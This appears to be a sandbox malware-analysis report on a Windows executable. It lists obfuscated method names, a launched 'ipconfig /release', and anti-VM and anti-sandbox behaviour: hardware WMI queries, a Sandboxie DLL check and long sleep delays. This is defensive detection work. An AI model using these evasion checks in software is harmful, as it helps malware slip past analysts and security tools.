                  Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, tiLJlFegcsjJY5bvKoi.csHigh entropy of concatenated method names: 'HJxQhOTdJnuFWxPE3le', 'mbf0dUTmIxaouRSvt1g', 'dfusqa2bab', 'vh0ry9Sq2v', 'DPqs0hh2g3', 'lGusLvGdLx', 'uGeswmuZOp', 'GyisNSe7HQ', 'Fe9P1whZbC', 'i6LeWP3AHy'
                  Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, JaR1TLbKvV3KQlwEEf6.csHigh entropy of concatenated method names: 'x6Vbe65AaY', 'MQAbsxC4KE', 'Tc2b0oVdXU', 'e7sbwS2Jds', 'OF3buvqJGu', 'ke6bEtuqt2', 'UPGbGeADEf', 'umxbpjYUb8', 'KkmbaWVSSG', 'iSDbZOxwm9'
                  Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, zXtqTfytwsUqV0HbShR.csHigh entropy of concatenated method names: 'qkkyPcuqL7', 'KJryC1eARu', 'G6Xy9S23QF', 'aBAySfsy7p', 'MrVyXWpnD5', 'FJNyJf7jQa', 'Fv5yAiQLQc', 'tvfyzPeXnR', 'RcHefgvMfZ', 'RlxebrdJHq'
                  Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, aX1L9ZdT0YTnGGVqLfb.csHigh entropy of concatenated method names: 'WIwdx7ZVUF', 'ArkdCRc2ZY', 'CysdS5CJl4', 'JnOdJK8bUE', 'zjadANr8ZU', 'LT6dzHCTVY', 'mgtmfhB6HK', 'ttVmb8TbeW', 'vMamh3Yx7C', 'GcxmOV2YxH'
                  Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, imGtPFK9EYwyvmpx65q.csHigh entropy of concatenated method names: 'BtYywKLIZF', 'IydyNHiMlZ', 'hi1yusD1r8', 'mdxHMX8ay7s2r893ekH', 'L5xo2T8lgV47WyWx3xr', 'vpxKXe4J7V', 'GVxKJqX6Eq', 'bgfKAy818Z', 'Q4kKzmwGSW', 'vaWyfH5jSM'

                  Persistence and Installation Behavior

                  barindex
                  Uses ipconfig to lookup or modify the Windows network settings
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: xnlP06YunJ.exe PID: 6616, type: MEMORYSTR
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeMemory allocated: 1A70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeMemory allocated: 33A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeMemory allocated: 31A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeMemory allocated: 4830000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598455Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598328Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598197Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598094Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597868Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597747Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597639Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597530Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597412Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597281Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597172Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596719Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595719Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595500Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595226Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595057Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594873Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594764Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594651Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594547Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594436Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594219Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWindow / User API: threadDelayed 1727Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWindow / User API: threadDelayed 8106Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -599344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -599125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -599015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -598906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -598797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -598687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -598455s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -598328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -598197s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -598094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -597984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -597868s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -597747s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -597639s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -597530s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -597412s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -597281s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -597172s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -597047s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -596937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -596828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -596719s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -596594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -596484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -596375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -596265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -596156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -596046s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -595937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -595828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -595719s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -595609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -595500s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -595375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -595226s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -595057s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -594873s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -594764s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -594651s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -594547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -594436s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -594328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180Thread sleep time: -594219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 600000Jump to behavior
